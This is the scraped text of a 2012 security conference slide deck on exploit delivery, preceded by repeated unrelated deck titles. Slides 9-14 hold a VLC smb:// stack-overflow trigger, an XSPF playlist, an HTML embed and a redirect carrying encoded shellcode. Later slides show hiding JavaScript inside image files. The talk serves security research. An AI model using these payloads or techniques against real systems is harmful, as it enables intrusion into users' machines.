A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 

Innovative Exploit Delivery

  • 1. INNOVATIVE EXPLOIT DELIVERY SAUMIL SHAH net-square HITB2012KUL
  • 2. # who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University. • saumil@net-square.com • LinkedIn: saumilshah • Twitter: @therealsaumil net-square
  • 3. My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference "Eyes and Speaker ears open" net-square
  • 4. When two forces combine... Web Binary Hacking Exploits net-square
  • 5. SNEAKY LETHAL net-square
  • 7. 302 IMG JS HTML5 net-square
  • 9. VLC smb overflow • smb://example.com@0.0.0.0/foo/#{AAAA AAAA....} • Classic Stack Overflow. net-square
  • 10. VLC XSPF file <?xml version="1.0" encoding="UTF-8"?> <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList> </playlist> net-square
  • 11. Alpha Encoded Tiny ZOMFG Exploit URL net-square
  • 12. 100% Pure Alphanum! net-square
  • 13. VLC smb overflow - HTMLized!! <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> net-square
  • 14. 301 Redirect from tinyurl HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/5.2.12 Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAX P0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNO QeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBAB XP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoLKPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIP QdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHkPfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJc EaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxHkEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOs IPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDnCUCHPeEPAA} Content-type: text/html Content-Length: 0 Connection: close Server: TinyURL/1.6 net-square
  • 16. Exploits as Images - 1 • Grayscale encoding (0-255). • 1 pixel = 1 character. • Perfectly valid image. • Decode and Execute! net-square
  • 18. I'm an evil Javascript I'm an innocent image net-square
  • 20. net-square c) no eval()
  • 21. Same Same No Different! var a = eval(str); a = (new Function(str))(); net-square
  • 23. IMAJS Seeing is Believing net-square
  • 24. Browser Support for IMAJS-GIF Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes - net-square
  • 25. Browser Support for IMAJS-BMP Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes - net-square
  • 26. e) The αq exploit net-square
  • 27. Encode using Alpha channel net-square
  • 28. Demo IMAJS αq FTW! net-square
  • 29. f) ONE LAST DEMO!!! net-square
  • 30. The FUTURE? HTML5 Video SVG WebGL Mobile Browsers net-square
  • 31. KTHXBAI See you in 2013?? net-square saumil@net-square.com | @therealsaumil